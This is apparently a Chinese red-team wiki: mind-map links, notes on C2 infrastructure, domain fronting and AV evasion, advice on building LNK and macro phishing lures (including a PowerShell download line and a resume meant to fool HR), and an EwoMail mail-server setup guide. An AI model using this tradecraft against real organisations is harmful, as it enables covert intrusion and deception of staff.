# 渗透测试文库

灵感来源于ired.team。其中框架为PTES，风格为ATT&\&CK。

{% hint style="danger" %}
接护网，接培训；请尊重作者版权；
{% endhint %}

[wiki.iredteam.cn](https://wiki.iredteam.cn)作为黑锋安全团队([Black Front Security Team](https://www.iredteam.cn))第一个开放项目，证明我们有能力为客户提供完整的ATT\&CK企业安全对抗方案。同时作为文库类项目，不管是初学者还是对网络安全有一定了解的安全人员，看到我们的文库都会对**渗透测试**&&**红队攻击**有一个清晰的流程。

这是我了解网络安全以来五年内的所学整理的思维导图类文库，文库中没有实战，更多实战资源会在**黑锋安全小组**公众号内发布，敬请期待。

{% hint style="warning" %}

* 我为文库付出了超过90%，期待安全朋友参与到文库的开发中来。
* 尊重技术，尊重版权。所以不要轻易克隆我们的文库。
* 后续我们会有其他项目的开发，期待您的关注。
* 期待您的合作与赞助，我们将竭尽所能。
  {% endhint %}

这个文库还在完善中。如果您发现我侵权了，我及我的团队深表致歉，实在是您的发出来的东西无法超越。我不想改版您的东西，同时会附上您的署名。如果您真的不是很高兴，您可以通过公众号联系到我，我会及时处理删除。

我们的力量是有限的，记忆力也是有限的。我们只是单纯的技术爱好者，绝对不存在炫技行为。更有可能您会觉得技术比我们的水平高，那我也是愿意去和您学习的。

## 书写背景&&目的

有这个想法是在2019年末的时候，当时就想把全流程的渗透测试步骤记录下来，到了2020年3月由于工作原因还没有开始，终于在2020年8月的时候开始一点一点记录渗透测试的每一个环节，当时只是用Markdown开始记录，不知不觉的已经做成了一个大项目。

{% hint style="success" %}

* 钓鱼攻击
* 红队速查
* 以内部完档--->全面开放
* ATT\&CK企业安全对抗方案
* 信息收集--->前渗透--->后渗透
* 形象立体--->由点及面--->完整闭环
  {% endhint %}

## 社交媒体

公众号

![黑锋安全小组](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MU8S3fhYtwVdvUuOj70%2F-MU8S9mSnuYXakg3ubUR%2Fqrcode_for_gh_9e3046d3708a_344.jpg?alt=media\&token=4ea9805e-435f-47d8-b029-f27e578bd5f9)


# 安全思维导图


# 安全思维导图

来源自MITRE | ATT\&CK 中文站https\://huntingday.github.io/


# 红队 \[ 蓝军 ] 完整战术 生命周期

![红队 \[ 蓝军 \] 完整战术 生命周期](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTyIHqriBjd3v54rD8-%2F-MTyItlzr6Du1RprDRCX%2FredTeamTactics.png?alt=media\&token=503b3437-9646-4d07-a11c-cbe423b0da45)


# 工作组 渗透入门 \[ 内网搜集实战 ]

![工作组 渗透入门 \[ 内网搜集实战 \]](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTyJV57SMmArlEr1fZ1%2F-MTyJxacINgY_VJvqsn_%2Fworkgroup.png?alt=media\&token=2658e97a-55b6-4342-8c69-91895b2b6ab9)


# 常规域渗透入门 实战细则 \[ 单域 ]

![常规域渗透入门 实战细则 \[ 单域 \]](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTyIHqriBjd3v54rD8-%2F-MTyJ-uOLYr9ENcfzPbL%2FAdsec.png?alt=media\&token=6a5a9247-9d1b-4420-a4f5-8146f357356f)


# 内网通道构建入门 实战

![内网通道构建入门 实战](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTyJV57SMmArlEr1fZ1%2F-MTyKRWQrUFmPdRQIXsC%2Ftunnel.png?alt=media\&token=e45c416e-9723-43f5-9511-76f5184bcb96)


# 系统提权入门 实战

![系统提权入门 实战](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTyJV57SMmArlEr1fZ1%2F-MTyLKy-F0HkKepFsNB3%2FLocalprivilege.png?alt=media\&token=d7511633-0f94-4335-a00a-a5d7713d7cbe)


# 内网横向渗透入门 实战

![内网横向渗透入门 实战](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTyJV57SMmArlEr1fZ1%2F-MTyLXVaGDz3bYUoUauo%2FLateralMovement.png?alt=media\&token=f11dae7f-5f14-4ae4-b800-66bdc1a28f72)


# 单机持久化控制入门 实战

![单机持久化控制入门 实战](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTyJV57SMmArlEr1fZ1%2F-MTyLXVaGDz3bYUoUauo%2FLateralMovement.png?alt=media\&token=f11dae7f-5f14-4ae4-b800-66bdc1a28f72)


# 内网入口搜集 实战

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTyJV57SMmArlEr1fZ1%2F-MTyLfeaA4AoewoVYIdo%2Fpersistence.png?alt=media\&token=593922f5-7640-4fec-a927-64becf02722a)


# 渗透思维导图

持续更新开发中

![渗透思维导图](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MTJk2vEL_mEeJa3PfIX%2F-MTJkaMillrjSPprm5KV%2F%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%96%87%E5%BA%93.png?alt=media\&token=ea1b4d47-3a84-4b3b-90ff-4145ff404af2)


# 信息收集思维导图

![信息收集思维导图](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMWsAgTfLIgPCWjjFo%2F-MUMXHt2aQtaG_lK40jt%2F2Web%E7%9B%AE%E6%A0%87%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.png?alt=media\&token=7a1f5255-c9b4-4654-813e-dceeda51d02f)


# 文件上传绕过思维导图

![Upload绕过](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUNHQ0PI_l-DliKCtZK%2F-MUNIhzascwHH8eDD4At%2FUpload%E7%BB%95%E8%BF%87.png?alt=media\&token=7ced51c0-4651-4a26-ac45-64e766b0dfd1)


# C2前期准备


# C2汇总

![C2汇总](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MU2frhWb8mIGxXqcKia%2F-MU2h5sCBEFEeWnH78ha%2FC2%E6%B1%87%E6%80%BB.png?alt=media\&token=d4022fc9-1662-46c4-8fd9-449c6f7c66ed)


# C2内网穿透策略

简单画个图哈，莫笑

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MV5tPzXlDUM6U3WpJ9v%2F-MV5tuP7Vfqj85t0qYpg%2Fc2%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E7%AD%96%E7%95%A5.png?alt=media\&token=55e169e2-e12f-4bec-bccd-40672e8b6755)

通过上面C2执行逻辑，在本机架设C2，再内网穿透出去，可以达到省钱的目的。

这边还有最为重要的问题就是域名问题，购买高质量域名


# 红队之外网定向打点

来源自2019北京网络安全大会

## **基础设施架构设计部署**

* 普通架构：红队人员--》teamserver cs--》目标机 缺点：功能未分离、无潜伏通道、回连日志多、灵活性较低
* 演进架构：DNS/HTTP/HTTPS分离server tips：1\~2cpu 2G内存 10G硬盘，回连数不超过5台，潜伏通道（根据实际目标环境优先）
* 完整架构：域名和IP（VPS）teamserver（CS）前置机（redictor） CS -》teamservers 1/2/3/... 前置层（SMTP/PAYLOAD/C2/隐蔽C2）

## **选择域名**

* 抢注过期域名 expireddomains.net DELETE DOMAIN
  * tips1: 不要包含世界大厂和杀毒厂商相关的域名，以及和目标相关的域名
  * tips2：注册目标相关区域常见的域名，记得开隐私保护
  * 其他：[www.freshdrop.com](https://wiki.iredteam.cn/prophase-interaction/c2-preparation/c2-summary/www.freshdrop.com) [www.domcop.com](https://wiki.iredteam.cn/prophase-interaction/c2-preparation/c2-summary/www.domcop.com)
  * tips3：检查域名是否被分类，金融、医疗、电商、航空、旅游 great
  * tips4：去VT、微步检查，域名是否被标黑
  * tips5：举报滥用规则仔细阅读（freenom 慎用）
* 培养域名（养号）
  * 搭建正常域名，提交至各安全厂商给站点分类
  * tips1：把域名A记录解析到大厂ip，使用时候再解析到C2，不用时候解析回大厂ip
  * tips2：VT 自评， alex 自评
* 域名解析检测
* 域名分类检测
  * domaincheck：
* IP检测
  * 外网IP，通过情报站看是否被标黑
  * 使用CDN隐藏真实IP（部分安全厂商会拦截CDN IP）
* 借鸡生蛋，
  * subdomain takeover：高信誉域名A解析B -》
  * 高信誉肉鸡做前置转发
* C2工具
  * 自定义流量特征：DNS/HTTP/HTTPS/SMB和TCP
  * Payload加载流程：shellcode/Loader/Stageless/beacon
  * DNS：如果用到dns通道默认参数必须修改（容易被设备检测），不要用DNS做数据通道
  * HTTP（S）：不要在uri中的文件后缀设置js、css等静态文件，效果：付费证书>免费证书>自签名证书 （Let's Encrypt 免费 3个月过期，开自动续）
  * CS 3.14
* Redirector

  * Office365、Pastebin、Slack、Facebook、Dropbox、Gmail、Twitter..
  * 缺点：需要硬编码到第三方服务
  * 第三方服务用作C2相关资源汇总

  ```
  https://pentestarmoury.com/2017/07/19/s3-buckets-for-good-and-evil/ 
  https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/                       
  https://github.com/daniel-infosec/wikipedia-c2                       
  https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign                       https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/                       
  https://blog.netspi.com/databases-and-clouds-sql-server-as-a-c2/                       
  https://outflank.nl/blog/2017/09/17/blogpost-cobalt-strike-over-external-c2-beacon-home-in-the-most-obscure-ways                       https://labs.mwrinfosecurity.com/blog/tasking-office-365-for-cobalt-strike-c2                       
  https://github.com/maldevel/canisrufus                       
  https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications                       https://github.com/byt3bl33d3r/gcat                       
  https://github.com/maldevel/gdog                       
  https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf                       
  https://github.com/bkup/SlackShell                       
  https://github.com/j3ssie/c2s                       
  https://github.com/praetorian-code/slack-c2bot                       
  https://github.com/microsoft/skype-dev-bots                       
  https://github.com/PaulSec/twittor                       
  https://blog.talosintelligence.com/2017/04/introducing-rokrat.html                       
  https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf                       
  https://github.com/woj-ciech/Social-media-c2
  ```

  * Google App Engine| Amazon |Azure|Aliyun CDN
  * 可见层：DNS、TLS
  * 不可见层：HTTPS
  * URL（高信誉） SNI（高信誉） HOST(C2)
  * <https://github.com/vysecurity/DomainFrontingLists>
  * 代替方案：HTTP pipelining（ >http 1.1 ）
  * 和 domain fronting 效果相同
  * 利用同一个tcp连接发送不同的host的http包
  * tips：good domain + bad domain 包一层同时发过去
  * 建议使用多个判断过来请求，拒绝使用默认uri，对抗全网C2扫描
  * 仅允许目标相关IP访问，对抗云沙盒
  * 限定访问时间段，只在某个时间段请求payload
  * 不要把非payload的uri重定向到google等高信誉域名
  * 建议：在[www.aaa.com](https://wiki.iredteam.cn/prophase-interaction/c2-preparation/c2-summary/www.aaa.com)搭建来养域名，使用c2.aaa.com的二级域名做C2
  * DNS socat|iptables|ssh（tmux和screen选一个）
  * Apache|Nginx
  * Tips：
  * Domain Fronting（隐藏IP、域名的方式）
  * 第三方服务用作C2
* 邮件钓鱼（SMTP）
  * 域名：同C2域名选择
  * 高信誉的邮件发送者：Mailchimp、Sendgrid
  * 正确配置SPF、DKIM\DMARC
  * SSL证书
  * 发送时间和频率
  * 一键部署
  * 钓鱼邮件框架：Gophish (<https://github.com/gophish/gophish>)
* 隐蔽性和安全性
  * 解决方案：V2ray + Nginx + CLoudflare + Freenom+ Websocket 搭建代理
  * 权限最小化：使用iptalbes限定组件通讯，SSH进行端口转发
  * Teamserver：限制端口只能本地访问，限制beacon监听端口只能redirector访问
  * Tips：VPS容易被GFW拦截？
* 基础设施监控系统
  * 记录完整日志，设置告警
  * 自动化部署 LuWu（<https://github.com/QAX-A-Team/LuWu>）
  * 日志中心

## 钓鱼样本制作

* 钓鱼邮件类型
  * 恶意的chm文档：利用easy，但目前比较难过杀软，免杀效果差
  * 带有恶意宏代码的office文档：易于混淆（结合图片模糊之类），但需要手动开宏，进程链可疑
  * 白加黑钓鱼：利用带签名的白程序，通过DLL劫持的方案加载恶意DLL；比较容易过AV，但需要解压执行
  * LNK文件钓鱼：链接对象是Powershell，进程链完善
  * PPT钓鱼样本：PPT超链接，弹出“安全声明”，不用启动宏，但必须全屏播放，启用才执行；不推荐使用
  * 漏洞利用的钓鱼邮件：效率高，同样成本也高
* 写工具自动化生成恶意lnk，关键函数：
  * IShellLink::SetIconLocation()
  * IShellLink::SetShowCmd() 窗口显示
  * IShellLink::SetArguments()
  * IShellLink::SetPath()
  * ...
* LNK钓鱼邮件制作
  * 短文件名 POWERS\~1.EXE
  * 代码混淆 参考赛门铁克的paper
  * 安全类进程检测
  * 遍历进程，获取进程对应的版权信息，与黑名单列表比对
  * 优点：升级版本也不变，通用
  * 进程名检测
  * 窗口标题检测
  * 虚拟机-取证工具-杀软检测-调试器
  * 常规手法
  * 新姿势
  * 如何根据PID获取进程的全路径：ProcessExplorer
  * x86不太可行，x64可以
  * 绕过PCHunter 0RING hook
  * 检测后行为，通知攻击者，及时善后处理
  * 联网下载Word文档
  * 本地释放Word文档
  * 协议内容还原：tcp、http、smtp
  * 文件内容还原：office、pdf、zip
  * 加壳程序还原：upx
  * 加密算法数据还原：base64
  * (New-Object System.Net.WebClient).DownloadFile(url, file\_path);
  * 数据还原引擎
  * 尾部可以追加任意大小的word、PE、PowerShell
  * select -last 1 定位到最后一个对象，以“\n”划分对象
  * select -index 1 也可以
  * ARGUMENT用于LNK中存储命令行参数
  * StringData结构，CountCharacters
  * IShellLink::SetArguments()
  * 塞入数据的最大值是 explorer.exe 对命令行参数长度的限制
  * 实测得出 0x7FC2（31KB）
  * 将Word塞到COMMAND\_LINE\_ARGUMENTS
  * 将Word塞到lnk文件的尾部（推荐使用）
  * 钓鱼简历的编写：内容可选浮夸，让HR打开看完后大概率删除，防止提给技术人员
  * LNK图标的显示：改成各个系统都能默认显示的通用图标
  * 如何隐藏行为：SetShowCmd() 最小化窗口
  * Word文档存放：
  * 杀软对抗


# 钓鱼平台搭建及应用


# 搭建属于自己的个人邮件服务器 --EwoMai

## 0x01至于搭建个人邮件的原因？

哈哈，原因很简单，作为一个单身许久的程序员实在是无聊。一次偶然的机会接触到了公司搭建的个人邮件服务器。趁着周末时间看了一下网上开源的邮件服务器iredmail、extmail、emos、umail 等；都各有个的优点，论安全性的话我觉得 extmail 邮箱服务器很好，至于我为什么不选择 extmail 因为我尝试了一下，这个是基于 PHP 写的，配置起来太痛苦了，于是小编找遍网上各种开源的 Email 服务器，于是选择了 EwoMai . 原因是界面还不错，还可以切换主题，至于安全性的嘛开源版本的没有绝对的安全，这就点忽略了。

## 0x02EwoMail 简介

EwoMail 是基于 Linux 的开源邮件服务器软件，集成了众多优秀稳定的组件，是一个快速部署、简单高效、多语言、安全稳定的邮件解决方案，帮助你提升运维效率，降低 IT 成本，兼容主流的邮件客户端，同时支持电脑和手机邮件客户端。

### 安全与稳定：

集成知名的开源反垃圾和防病毒组件，为你的邮件保驾护航，服务器定时更新病毒库，无需管理。支持基于 TLS/SSL（POP3/IMAP/SMTP）邮件传输加密，支持服务器与邮件账号的密码破解防御。数据安全，可以根据需求在你的服务器定时备份数据（包括邮件数据）

### 集成组件

* Postfix：邮件服务器
* Dovecot：IMAP/POP3/邮件存储
* Amavisd：反垃圾和反病毒 (低配置服务器建议关闭)
* Fail2ban：监控策略
* LNAMP：apache2.2，nginx1.8， mysql5.5，php5.4
* EwoMail-Admin：Web 邮箱管理后台
* Rainloop：webmail

## 0x03安装环境

服务器需要干净环境，要求全新干净系统，不能安装在已有的 apache,mysql 的环境中。在上面吃过亏数据库给搞坏了，恢复数据大半天放弃了。

### 配 置：

1. 云服务器（CentOS 6/7 系统）
2. 域名（国内需要备案）

### 最低配置：

* CPU：1 核
* 内存：1G
* &#x20;磁盘： 40G

由于新版本的杀毒软件占用的内存比较多，512M 到 2GB 内存请参考降低内存占用

## 0x03准备工作

Nginx 反向配置,SSL 证书配置

### 域名解析配置

首先进入到各大服务商的域名控制台，点击解析按钮，配置以下参数；

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMb6DKIrzt9QUXkwMP%2F-MUMdBgQ-OaJLuofa0Pc%2Fimage-97e2e3e6.png?alt=media\&token=309dede6-2af3-478d-88d9-f896759713fd)

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMb6DKIrzt9QUXkwMP%2F-MUMdM2an8K5UmvTqwmH%2Fimage-e9c2192f.png?alt=media\&token=d7c1da55-dbf0-49c9-be2d-f27e9bb6017e)

| 主机记录 | 记录类型  | 解析线路 | 记录值                                    |
| ---- | ----- | ---- | -------------------------------------- |
| mail | A     | 默认   | 服务器 IP                                 |
| @    | A     | 默认   | 服务器 IP                                 |
| pop3 | CNAME | 默认   | mail.slera.cn                          |
| pop  | CNAME | 默认   | mail.slera.cn                          |
| imap | CNAME | 默认   | mail.slera.cn                          |
| smtp | CNAME | 默认   | mail.slera.cn                          |
| @    | TXT   | 默认   | v=spf1 include:~~118.24.188.192~~ -all |
| @    | MX    | 默认   | mail.slera.cn                          |

**删除线部分**需要改成服务器的 ip 地址，\_dnsauth 这两个是申请 ssl 证书的时候解析的地址，在 SSL 证书申请完成后会自动添加不需要手动添加。pop3，pop，imap 是邮局的协议目前流行的是 imap 协议，其他两个可以不用配置。

至此，域名解析就配置完成，可以进行准备安装了！！

## 0x04EwoMail 安装

### CentOS 6/7 防火墙

安装成功后，系统会开放以下的端口 ，CentOS 系统是默认开启防火墙的，可关闭

### **默认开放的端口**

端口都是 TCP 类型

8000，8010，443，8020，25，143，993，995，587，110，109，22，80，465

如果是使用的是云服务器，可能需要在控制面板的防火墙开放以上端口

必须打开的端口 8000，8010，25，143

### **关闭防火墙**

```
systemctl stop firewalld.service #停止firewall
systemctl disable firewalld.service #禁止firewall开机启动

#firewall 关闭之后看一下iptables状态

service iptables status
systemctl disable iptables.service
service iptables stop
```

### **服务器开启端口**

如果不关闭防火墙可以将端口添加为白名单

```
firewall-cmd --zone=public --add-port=80/tcp --permanent
```

### **关闭 selinux**

```
vi /etc/sysconfig/selinux
SELINUX=enforcing 改为 SELINUX=disabled
```

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMeCF0ORe7mCoZmmjJ%2F-MUMeNBlsKyex9o3n5Xp%2Fimage-3c88b48c.png?alt=media\&token=47b38af7-2ed9-4ad1-9215-9037153b7ebf)

### 检查 swap

如果没启动 swap，这会导致 EwoMail 的防病毒组件不能启动，所以在安装前先检查 swap 是否已经启动，如已启动可跳过该步骤。

```
查看swap
free -m
```

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMeCF0ORe7mCoZmmjJ%2F-MUMeamnj94v4tlzdjhQ%2Fimage-c3da1fad.png?alt=media\&token=91b52bdb-b3b1-4beb-b98c-0e6c9873bb56)

### **创建 swap 分区（内存超过 2G，可不配置）**

创建 1G 的 swap，可以根据你的服务器配置来调整大小

```
dd if=/dev/zero of=/mnt/swap bs=1M count=1024  
```

设置交换分区文件

```
mkswap /mnt/swap
```

启动 swap

```
swapon /mnt/swap
```

设置开机时自启用 swap 分区

```
需要修改文件 /etc/fstab 中的 swap 行，添加
/mnt/swap swap swap defaults 0 0
```

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMews0Ob6THpo0zq6y%2F-MUMfWoCivQHwuqZhFkK%2Fimage-681b6c03.png?alt=media\&token=51eae548-c6f6-4c9a-acc2-83ca87a39065)

个人觉得这地方最好重启一下，可能会因为/etc/fstab 挂载错误导致系统不能启动

### 邮箱域名

EwoMail 本身是可以配置多个域名来收发邮件的，但在安装前需要一个邮箱的主域名。本次教程例子使用的主域名是 iredteam.cn

### 设置主机名（可不配置主机名）

EwoMail 在安装后会默认使用域名前缀 mail 的主机名，例如： mail.iredteam.cn

将系统主机名改成 iredteam.cn

查看当前主机名

```
hostname -f
```

### **CentOS7 配置**

输入命令：

```
hostnamectl set-hostname mail.iredteam.cn
```

修改文件 /etc/hosts , 添加 mail.iredteam.cn，添加 hosts 可以加快域名解析(也可以不配置)

### 安装(方法一)

虽然官方建议使用此方法安装，但是个人不建议使用 Git 方式安装，个人推荐下面方法二通过一个链接就可以安装完成，因为我尝试了 N 次虽然显示安装成功了，

但是实际并没有，还有个原因版本库是在 GitHub 上面，国外的网站访问速度有限制。

GitHub 项目地址 [https://github.com/gyxuehu/EwoMail](https://link.ld246.com/forward?goto=https%3A%2F%2Fgithub.com%2Fgyxuehu%2FEwoMail)

```
yum -y install git
cd /root
git clone https://github.com/gyxuehu/EwoMail.git
cd /root/EwoMail/install
#需要输入一个邮箱域名，不需要前缀，列如下面的ewomail.cn
sh ./start.sh ewomail.cn
```

### 安装 (方法二)

安装前请服务器必须已链接网络，安装时间将会根据你的系统配置和网络环境大概会在 10 分钟内安装完成。（需要 root 权限）

打开：[http://www.ewomail.com/list-11.html](https://link.ld246.com/forward?goto=http%3A%2F%2Fwww.ewomail.com%2Flist-11.html) 输入域名获取安装代码

```
wget -c http://download.ewomail.com:8282/ewomail-1.05.sh && sh ewomail-1.05.sh slera.cn
```

复制上面代码注意修改域名，执行安装命令后全程会自动安装(需要 root 权限);

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMews0Ob6THpo0zq6y%2F-MUMgEtXCuer23FBz4Ky%2Fimage-611b5737.png?alt=media\&token=90c6c7d0-0965-427a-be39-83e246361aa3)

安装过程中可能会显示 shutting down postfix : FAILED，如果它的下面再出现一条 starting postfix : OK ，那就是正常的。

安装成功后将会输出”Complete installation”。

查看安装的域名和数据库密码

```
cat /ewomail/config.ini
```

#### 遇到的报错

部分 CentOS 版本可能会在安装时不兼容的情况，会出现 ewomail-lamp install failed

&#x20;在 sh ./start.sh xxx.com 安装域名后面加-f

#### 完整语句

```
sh ./start.sh xxx.com -f
```

注意：使用该命令安装，必须要求你的系统是全新干净的系统，而且系统没有安装 apache,mysql,nginx 这些组件，否则千万别执行该命令安装。

#### 启用 Nginx 代理 (Http 协议 + Https 协议)

https 协议需要申请 SSL 证书，阿里云、腾讯云等都可以免费申请

```
vim /ewomail/nginx/conf/nginx.conf
```

http 下加入 include /ewomail/nginx/conf.d/\*.conf;

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMh12G2EBvn49zE47v%2F-MUMhSuk8I2iQ6To538k%2Fimage-e9c38bfc.png?alt=media\&token=8efbe00a-512c-49e1-9a81-f563212b9fd6)

```
#创建conf.d文件夹
mkdir -p /ewomail/nginx/conf.d/

#进入conf.d路径下
cd /ewomail/nginx/conf.d/

#创建文件mail.conf
touch mail.conf

#编辑文件mail.conf
vim mail.conf
upstream mail{
   ip_hash;
   server 127.0.0.1:8000 max_fails=3 fail_timeout=600s;
server {
     listen 80;
     server_name slera.cn; #填写绑定证书的域名
     # 获取真实IP
     proxy_set_header X-Real-IP $remote_addr;
     proxy_set_header REMOTE-HOST $remote_addr;
     # 获取代理者的真实ip
     proxy_set_header X-Forwarded-For   $proxy_add_x_forwarded_for;
     proxy_http_version 1.1;
     #proxy_set_header Connection "";
     proxy_buffering off;
     proxy_redirect off;
     location / {
             proxy_pass http://mail;
     }
}

#下面是Https协议，需要申请SSL证书。[申请SSL证书](https://www.slera.cn/articles/2019/11/02/1572624076821.html)

#ssl_certificate和ssl_certificate_key分别是证书文件名称和私钥文件名称(很重要！！)
server {
        listen 443 ssl backlog=65535;
        #ssl on;
        server_tokens off;
        server_name slera.cn;
        #access_log /gs/nginx-logs/teach.access.log;
        #proxy_set_header Host $host:$server_port;
        proxy_set_header Host $host;
        # 获取真实IP
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header REMOTE-HOST $remote_addr;
        # 获取代理者的真实ip
        proxy_set_header X-Forwarded-For   $proxy_add_x_forwarded_for;
        proxy_http_version 1.1;
        #proxy_set_header Connection "";
        proxy_buffering off;
#        proxy_redirect off;
        ssl_certificate /ewomail/nginx/crt/slera.cn.pem;#证书文件名称
        ssl_certificate_key /ewomail/nginx/crt/slera.cn.key;#私钥文件名称
        ssl_session_timeout 5m;
        ssl_protocols TLSv1 TLSv1.1 TLSv1.2; #请按照这个协议配置
        ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:HIGH:!aNULL:!MD5:!RC4:!DHE;#请按照这个套件配置
        ssl_prefer_server_ciphers on;
    location / {
             proxy_pass http://mail;
     }
}
```

## 0x05邮箱管理后台

### 登录界面

在浏览器输入你的邮箱管理后台地址，例如：<http://IP:8010>

默认账号：admin密码：ewomail123

首次登陆后请尽快改密码。<http://服务器> IP:8010/Admin/user

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMh12G2EBvn49zE47v%2F-MUMhfTGhDtv1HWFHBDV%2Fimage-ee0aa458.png?alt=media\&token=1209cbec-9087-4c63-8698-b0fd6264875f)

### 邮箱域名管理

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMh12G2EBvn49zE47v%2F-MUMht5uBm_XsfTnU8LH%2Fimage-b51dfd6f.png?alt=media\&token=47565575-9ab7-4da9-beba-47ab3e8f7401)

系统安装后会自动把邮箱主域名添加，手动在后台添加的域名基本是副域名。

添加域名后需要设置副域名的 DNS 才能正常收发邮件。

### 邮箱系统设置

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMh12G2EBvn49zE47v%2F-MUMi3aJkuVfxh7edmqU%2Fimage-d542dad7.png?alt=media\&token=0c5f3053-d25a-4255-992a-48dec52ecbae)

系统安装后会自动添加配置信息，在更改主域名后才需要更改邮箱配置信息，一般情况下不建议修改。

imap 和 smtp 是客户端的配置信息。

### 邮箱用户管理

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMh12G2EBvn49zE47v%2F-MUMiG1fHuTRrJHHqCuQ%2Fimage-5fe2312b.png?alt=media\&token=8f215f37-6b91-4c68-9a58-7dcb743ebb0c)

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMh12G2EBvn49zE47v%2F-MUMiKJM2fsr8eCsY7uE%2Fimage-dcc4cb2c.png?alt=media\&token=5725f780-358d-470c-b240-c7fbba21300a)

接下来就可以通过 <http://服务器> IP:8010 进行登录了。

### 无法连接服务器

1、安装过程检查是否有报错

2、检查运营商是否开放 25 端口出站方向

* 25 端口是邮局通信的固定端口，不能更换成其他端口，465 端口只用登录（465 端口不是用于发送邮件，只用于登录，将邮件数据加密传送到本地服务器，最后本地服务器将会链接对方邮局的 25 端口，进行邮件发送，基本所有的邮局，都只用于 25 端口来接收邮件）
* 如果你的 25 端口出站方向被屏蔽了，那么你就不能发送邮件到外面的邮局。
* 但你可以使用 465 端口登录第三方服务器的邮局

> 首先在服务器执行以下命令测试你的端口是否正常，注意（是在你搭建邮局的服务器执行）

以下命令不需修改，复制执行即可

```
yum install xinetd telnet telnet-server -y
telnet smtp.qq.com 25 
```

正常情况下：

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMh12G2EBvn49zE47v%2F-MUMijYj_Xwy7XAwRReV%2Fimage-7d10679a.png?alt=media\&token=868643d4-13fb-4783-a0eb-73d77ac364ef)

出于安全考虑，阿里云、腾讯云默认封禁 TCP 25 端口出方向的访问流量，即你无法在阿里云上的云服务器通过 TCP 25 端口连接外部地址，需要去云服器商申请开通 25 访问 [详情](https://help.aliyun.com/knowledge_detail/56130.html)

## 0x06降低内存占用

```
#查看内存占比命令
free -m
```

命令执行

```
#安装vim
yum install vim -y
#修改文件（修改前请备份文件）
vim /etc/amavisd/amavisd.conf
输入 :set number 回车显示行号
输入 i 回车可以编辑修改
找到大概在383行左右，将图片以下的4行前面加上#符号
```

